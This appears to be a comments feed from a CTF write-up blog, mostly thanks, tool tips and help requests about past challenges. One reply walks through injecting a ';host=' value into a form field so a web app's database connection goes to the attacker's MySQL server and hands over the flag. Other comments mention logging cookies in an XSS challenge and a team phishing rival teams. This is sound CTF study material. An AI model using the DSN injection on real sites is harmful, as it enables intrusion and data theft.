Comment on [NDH 2016] [FORENSICS 200 – I’M AFRAID OF A GH0ST NAMED POISON IVY] Write Up by The lsd https://0x90r00t.com/2016/07/08/ndh-2016forensics-200-im-afraid-of-a-gh0st-named-poison-ivy-write-up/#comment-7532 Sat, 30 Jul 2016 09:56:47 +0000 https://0x90r00t.com/?p=2541#comment-7532 Hello Big5,

Thanks for your feedback, I waited it for a looooong time 🙂
Even if there was some bugs, it was a really nice challenge. I loved to bang my head against the wall during hours.
Concerning the junk data at the end of the decrypted text, the goal for me was to find something (at least the beginning of the flag), so I didn’t racked my brain to strip the junk.
I hope you’ll do other networking challenges for the next NDH (but without bug please :p)

Oh, and I’m always ready for beer, just tell me when and where, I’ll be there 🙂

Enjoy

The lsd

]]>
Comment on [IceCTF 2016] [Misc 60 – Blue Monday] Write Up by forensicator https://0x90r00t.com/2016/08/26/icectf-2016-misc-60-blue-monday-write-up/#comment-8682 Thu, 08 Sep 2016 14:31:52 +0000 https://0x90r00t.com/?p=2715#comment-8682 Oh my God! I never thought of this. I saved the file as a midi file and could not make sense from the tune. Nice one.

]]>
Comment on [Hack The Vote 2016] [Forensics 300 – More suspicious traffic] Write up by LtDan https://0x90r00t.com/2016/11/09/hack-the-vote-2016-forensics-300-more-suspicious-traffic-write-up/#comment-11501 Sat, 12 Nov 2016 03:32:44 +0000 https://0x90r00t.com/?p=2837#comment-11501 Really good write up! I’m glad you enjoyed the challenge!

]]>
Comment on [Hack The Vote 2016] [Forensics 300 – More suspicious traffic] Write up by The lsd https://0x90r00t.com/2016/11/09/hack-the-vote-2016-forensics-300-more-suspicious-traffic-write-up/#comment-11558 Sun, 13 Nov 2016 12:43:58 +0000 https://0x90r00t.com/?p=2837#comment-11558 Hello LtDan,

Thanks for you answer, it’s always nice to have some author reviews!

If you wan’t to make other pcap challs, please don’t hesitate, fun networking challenges are so uncommon 🙂

Enjoy

The lsd

]]>
Comment on [Juniors CTF 2016] [Web 300 – Six Strange Tales] Write Up by just_a_stranger https://0x90r00t.com/2016/11/27/juniors-ctf-2016-web-300-six-strange-tales-write-up/#comment-12351 Sun, 27 Nov 2016 19:48:03 +0000 https://0x90r00t.com/?p=2897#comment-12351 Thanks for this!
I bruteforced all possible combinations, even written backwards. And nothing…
Ofc, just like you pointed out, I had misstyped the O for a zero…

]]>
Comment on [Juniors CTF 2016] [Trivial admin 400 – ROFL] Write Up by pturtle https://0x90r00t.com/2016/11/27/juniors-ctf-2016-trivial-admin-400-rofl-write-up/#comment-12579 Thu, 01 Dec 2016 17:51:05 +0000 https://0x90r00t.com/?p=2901#comment-12579 You can just use decode function in Python with ‘koi8-r’ as first argument in it and don’t use brute in flag field 😉

]]>
Comment on [Juniors CTF 2016] [Trivial admin 400 – ROFL] Write Up by WtF https://0x90r00t.com/2016/11/27/juniors-ctf-2016-trivial-admin-400-rofl-write-up/#comment-12631 Fri, 02 Dec 2016 19:16:20 +0000 https://0x90r00t.com/?p=2901#comment-12631 You’re right! An admin gave the hint of “koi8-r” after we solved it 🙁

]]>
Comment on [Juniors CTF 2016] [Misc 500 – Oldschool] Write Up by erebos https://0x90r00t.com/2016/11/27/juniors-ctf-2016-misc-500-oldschool-write-up/#comment-13325 Sun, 18 Dec 2016 09:59:47 +0000 https://0x90r00t.com/?p=2874#comment-13325 Hi,
How did you find the table ?

]]>
Comment on [Juniors CTF 2016] [Misc 500 – Oldschool] Write Up by WtF https://0x90r00t.com/2016/11/27/juniors-ctf-2016-misc-500-oldschool-write-up/#comment-13612 Sat, 24 Dec 2016 11:57:39 +0000 https://0x90r00t.com/?p=2874#comment-13612 Hello erebos,
With some Googling about Castlevania & hacking, I found this website :
http://www.thealmightyguru.com/Games/Hacking/Hacks/SimonsRedaction.html
The table I found is here:
http://www.thealmightyguru.com/Games/Hacking/Wiki/index.php/Castlevania_II:_Simon%27s_Quest#Text

]]>
Comment on [Hack The Vote 2016] [Forensics 300 – More suspicious traffic] Write up by guest https://0x90r00t.com/2016/11/09/hack-the-vote-2016-forensics-300-more-suspicious-traffic-write-up/#comment-13661 Mon, 26 Dec 2016 04:05:43 +0000 https://0x90r00t.com/?p=2837#comment-13661 The 5*req/5*ans and 1*req/1*ans were not bugs. There’s some mdns and arp packet, wireshark calculate all. You need add filter such as “!(mdns) && !(arp)”.

]]>
Comment on [Hack The Vote 2016] [Forensics 300 – More suspicious traffic] Write up by guest https://0x90r00t.com/2016/11/09/hack-the-vote-2016-forensics-300-more-suspicious-traffic-write-up/#comment-13662 Mon, 26 Dec 2016 04:08:50 +0000 https://0x90r00t.com/?p=2837#comment-13662 In reply to guest.

Forget to say: your writeup is excellent, Thx!

]]>
Comment on [3DS CTF] [Exploit 300 – Please, no.] Write up by Macmod https://0x90r00t.com/2016/12/24/3ds-ctf-exploit-300-please-no-write-up/#comment-13691 Mon, 26 Dec 2016 15:25:36 +0000 https://0x90r00t.com/?p=2932/#comment-13691 As an admin pointed out afterwards, the exit is needed because of socat’s behaviour handling SIGSEGV:

https://gist.github.com/Macmod/130e780a69ec6d41d7bd57612314a541

]]>
Comment on [3DS CTF] [Exploit 300 – Please, no.] Write up by laxa https://0x90r00t.com/2016/12/24/3ds-ctf-exploit-300-please-no-write-up/#comment-13734 Tue, 27 Dec 2016 13:30:33 +0000 https://0x90r00t.com/?p=2932/#comment-13734 In reply to Macmod.

Thanks for pointing that out, your gist has 404 :(.
But the real problem is, why printf does’nt flush when appending a newline ? That’s also bothering me in that case.

]]>
Comment on [3DS CTF] [Exploit 300 – Please, no.] Write up by Macmod https://0x90r00t.com/2016/12/24/3ds-ctf-exploit-300-please-no-write-up/#comment-13762 Wed, 28 Dec 2016 07:40:35 +0000 https://0x90r00t.com/?p=2932/#comment-13762 In reply to laxa.

My bad, I erased it by mistake 😛

Perhaps printf is flushing the buffer, but socat holds it? I really have no idea who’s to blame, exactly.

https://gist.github.com/anonymous/6d70a68a8bd4efc4c86c98b28c21f0c3

]]>
Comment on [3DS CTF] [Exploit 300 – Please, no.] Write up by Macmod https://0x90r00t.com/2016/12/24/3ds-ctf-exploit-300-please-no-write-up/#comment-13763 Wed, 28 Dec 2016 07:46:23 +0000 https://0x90r00t.com/?p=2932/#comment-13763 This might be a good explanation:
http://stackoverflow.com/a/5229135

]]>
Comment on [EasyCTF 2017] [FORENSICS 325 – Decomphose] Write Up by TOUIMI SOFIANE https://0x90r00t.com/fr/2017/03/22/easyctf-2017-forensics-325-decomphose-write-up/#comment-16877 Fri, 24 Mar 2017 12:30:21 +0000 https://0x90r00t.com/?p=2987/#comment-16877 Bonjour
je veux savoir si vous pouvez m’enseigner le ethical hacking je suis très motivé et passionné par ce domain .
j’effectue un stage d’audit de vulnérabilités dans un startup au MAROC
En espérant que ma demande sera acceptée, je vous prie de croire, Madame/Monsieur, à mes sincères salutations.
Merci

]]>
Comment on [NDH 2017] [Web 250 – WhyUNoKnock] Write Up by big4 https://0x90r00t.com/2017/04/02/ndh-2017-web-250-whyunoknock-write-up/#comment-17121 Sat, 08 Apr 2017 16:04:39 +0000 https://0x90r00t.com/?p=3018/#comment-17121 How do you config your network to listen between webserver and mysql server

]]>
Comment on [NDH 2017] [Web 250 – WhyUNoKnock] Write Up by The lsd https://0x90r00t.com/2017/04/02/ndh-2017-web-250-whyunoknock-write-up/#comment-17426 Sat, 29 Apr 2017 14:52:54 +0000 https://0x90r00t.com/?p=3018/#comment-17426 Hello Big4,

Sorry for the delay, I didn’t saw your comment.

Actually, there were 3 steps :
– I allowed mysql to answer for every IP (bind-address 0.0.0.0)
– As my computer was behind my firewall, I had to create a firewall rule to allow the webserver to request the port TCP/3306 and a Destination NAT rule to forward these requests to my mysql server
– Finally, I used a network sniffer. I tried with the tcpdump like tool that was on my firewall, but it was a bit messy, so I used wireshark, which was installed on the computer which ran mysqld.

If you need firther explaination, just post another comment, I’ll answer fastly 🙂

Enjoy

The lsd

]]>
Comment on [NDH 2017] [Web 250 – WhyUNoKnock] Write Up by big4 https://0x90r00t.com/2017/04/02/ndh-2017-web-250-whyunoknock-write-up/#comment-17511 Sat, 06 May 2017 18:22:52 +0000 https://0x90r00t.com/?p=3018/#comment-17511 In reply to The lsd.

Thanks for your support!
Your write-up is very useful. It helps me to improve my knowledge. I’ll try it!

]]>
Comment on [NDH 2017] [Spying Challenge – Part1] Write Up by 0x90 https://0x90r00t.com/fr/2017/06/28/ndh-2017-spying-challenge-part1-write-up/#comment-21013 Wed, 28 Jun 2017 18:55:16 +0000 https://0x90r00t.com/?p=3084/#comment-21013 Le challenge est déjà terminé, vivements que quelqu’un sorte la partie 2 et 3. 😉

]]>
Comment on [NDH 2017] [Spying Challenge – Part2] Write Up by Nénozaure https://0x90r00t.com/fr/2017/06/30/ndh-2017-spying-challenge-part2-write-up/#comment-21248 Wed, 05 Jul 2017 12:06:07 +0000 https://0x90r00t.com/?p=3120/#comment-21248 C’était nous le phishing! juste une équipe qui a un peu ragé de ne pas passer en deuxième étape 😉
ça nous a bien fait rigolé de voir que des équipes se sont fait avoir, certaines même qui sont passé a la phase deux!
Ça n’avait rien de méchant, juste de l’amusement 😉
En tout cas, bravo pour tout!

]]>
Comment on [PoliCTF 2015] [Reverse 100 – Crack me if you can] Write Up by long https://0x90r00t.com/2015/07/13/polictf-2015-powned-100-crack-me-if-you-can-write-up/#comment-25892 Thu, 24 Aug 2017 12:16:56 +0000 https://0x90r00t.com/?p=324#comment-25892 hi,I would like to ask you what anti-compiler you use for smali to java? jd-gui is not good than your

]]>
Comment on [PoliCTF 2015] [Reverse 100 – Crack me if you can] Write Up by hackndo https://0x90r00t.com/2015/07/13/polictf-2015-powned-100-crack-me-if-you-can-write-up/#comment-27244 Wed, 06 Sep 2017 13:12:15 +0000 https://0x90r00t.com/?p=324#comment-27244 In reply to long.

I use apktool to decompile 🙂

]]>
Comment on [NDH 2017] [Web 250 – WhyUNoKnock] Write Up by bcs https://0x90r00t.com/2017/04/02/ndh-2017-web-250-whyunoknock-write-up/#comment-49129 Fri, 26 Jan 2018 15:47:59 +0000 https://0x90r00t.com/?p=3018/#comment-49129 Hi, nice whrite up ! But i want to make sure I understand. In fact you add one parameter to the $dns string to set the host as your sql server, so when you send that request to the formular it will try the ath on your own sql server so the ath is granted and the web server send you the response with the Flag ?

]]>
Comment on [NDH 2017] [Web 250 – WhyUNoKnock] Write Up by The lsd https://0x90r00t.com/2017/04/02/ndh-2017-web-250-whyunoknock-write-up/#comment-49131 Fri, 26 Jan 2018 16:33:55 +0000 https://0x90r00t.com/?p=3018/#comment-49131 Hello bcs,

Actually, we can just guess how the $dsn is on the server side. But we can easily suppose that $dsn looks like this :

‘mysql:dbname=’.$_POST[‘group’].’;host=127.0.0.1′

The default group value is users, so $dsn will be ‘mysql:dbname=users;host=127.0.0.1’

As I modified group value to ‘tableOnMyOwnSQLInstance;host=1.2.3.4’ (assuming 1.2.3.4 is my public IP which will listen for incoming connections), $dsn value is as followed:

‘mysql:dbname=tableOnMyOwnSQLInstance;host=1.2.3.4;host=127.0.0.1’

As the PDO class cannot connect to multiple hosts (which is quite logical actually 🙂 ), it will choose the first IP : mine!

Then, I have been a bit lucky. During the first test, I saw, that the PDO class tried to connect onto my SQL instance with the user “erpay” (as seen on the wireshark screenshot). So I just created an SQL user “erpay” with a password “erpay”.
When relaunching my test, the PDO class sent credentials and the authentication worked like a charm, meaning that my totally random choosen password was the good one 🙂

The last step has been to look at the attempted request, create the same table, and relaunch a last time my test. With the good table/fields, the requests was OK and the flag have been written onto my SQL instance.

If my explanations are a bit messy, or if you have other questions, feel free to reply me 🙂

Enjoy

The lsd

]]>
Comment on [NDH 2016][WEB 150 – Hello Friend] WRITE UP by rl1k https://0x90r00t.com/2016/07/04/ndh-2016web-150-hello-friend-write-up/#comment-90191 Mon, 08 Oct 2018 09:51:03 +0000 https://0x90r00t.com/fr/?p=2458#comment-90191 Challenge dans la categorie web… Je ne comprendrai jamais ces classifications…

]]>
Comment on [Real World CTF 2018] [Web 105 – Dot free] Write Up by Avinash https://0x90r00t.com/2018/07/30/real-world-ctf-2018-web-105-dot-free-write-up/#comment-92654 Tue, 15 Jan 2019 18:12:41 +0000 https://0x90r00t.com/?p=3406#comment-92654 Can’t we just directly log the cookies using console.log(document.cookie)

]]>
Comment on [TAMUctf 2019] [Network 500 – Homework Help] Write Up by m https://0x90r00t.com/2019/03/04/tamuctf-2019-network-500-homework-help-write-up/#comment-93258 Mon, 04 Mar 2019 09:52:50 +0000 https://0x90r00t.com/?p=3545#comment-93258 Uhh awesome

]]>
Comment on [TAMUctf 2019] [Network 500 – Homework Help] Write Up by Paul Ochon https://0x90r00t.com/2019/03/04/tamuctf-2019-network-500-homework-help-write-up/#comment-93264 Mon, 04 Mar 2019 15:17:41 +0000 https://0x90r00t.com/?p=3545#comment-93264 Good job Ectoplasme! ;P

]]>
Comment on [Hack The Vote 2016] [Forensics 300 – More suspicious traffic] Write up by page2me kitarotao https://0x90r00t.com/2016/11/09/hack-the-vote-2016-forensics-300-more-suspicious-traffic-write-up/#comment-96312 Fri, 30 Aug 2019 23:46:58 +0000 https://0x90r00t.com/?p=2837#comment-96312 tshark -nr TH-CTP-Quiz09.pcapng -q -z io,stat,0.3 | grep “>” | cut -d”|” -f3 | sed ‘s/12/-/g’ -| sed ‘s/6/./g’ – | tr -d ” \n” | sed ‘s/00/ /g’ | sed ‘s/0//g’| sed ‘s/8/./g’ | sed ‘s/ / /g’| sed ‘s/1//g’| sed ‘s/2//g’

]]>
Comment on [ECSC Quals 2019] [Crypto 398 – m04r_s1gz] by liao https://0x90r00t.com/2019/05/25/ecsc-quals-2019-crypto-398-m04r_s1gz/#comment-97119 Sat, 02 Nov 2019 12:02:38 +0000 https://0x90r00t.com/?p=3647#comment-97119 gool

]]>
Comment on [Trend Micro 2016] [Misc 100 – PCAP] Write Up by dating https://0x90r00t.com/2016/07/31/trend-micro-2016-misc-100-pcap-write-up/#comment-97474 Wed, 27 Nov 2019 14:12:56 +0000 https://0x90r00t.com/fr/?p=2669#comment-97474 It is important to note that the IPS is an inline Layer 2 device with no MAC address or IP address in the data path. Any potential vulnerability could only be exploited on its management port. Trend Micro TippingPoint, therefore, recommends that all customers secure network access to the management port of their IPS using an ACL or a management VLAN.

]]>
Comment on [Defcamp Quals 2024] [FORENSiCS 50 – rerdp] Write Up by Abdalrhman https://0x90r00t.com/2024/09/30/defcamp-quals-2024-forensics-50-rerdp-write-up/#comment-125173 Tue, 01 Oct 2024 08:06:17 +0000 https://0x90r00t.com/?p=3768#comment-125173 thanks for your help, I have a question after I put those lines into file
CLIENT_RANDOM 3a59c211663a5bffe1d7c216ec5fd10db830043423cc8384aa522baf55622c73 9bedb2b2685c2e6fb82a3e6a23fe7e9407d9a8bcf5417ee49b02b8cc6edb4316ec90fe37dcc0171378e8fd790ad9c307
CLIENT_RANDOM e4dddc52093aaa44867506e88f778737dcae9da4e297093c678049ef80136b1f 2e080bdc8fdc85862b185b3ad0a24f050d6576a520eb154afa0dcaf286daa420230d4914d101916c3c44c33819cff420

the file name is keylog.log and I followed what you write
Edit > Preferences > Protocols > TLS
(Pre)-Master-Secret log filename: File containing the `CLIENT_RANDOM` lines.
but there is no difference in the pcap file I used rdp as a filter but there is no any rdp packets
can you help

]]>
Comment on [Defcamp Quals 2024] [FORENSiCS 50 – rerdp] Write Up by Abdalrhman https://0x90r00t.com/2024/09/30/defcamp-quals-2024-forensics-50-rerdp-write-up/#comment-125174 Tue, 01 Oct 2024 08:09:58 +0000 https://0x90r00t.com/?p=3768#comment-125174 In reply to Abdalrhman.

even when I tried this
We export the decoded Wireshark’s session into rerdp.pcap by selecting File > Export PDUs and selecting OSI Layer 7.
I get an empty file

]]>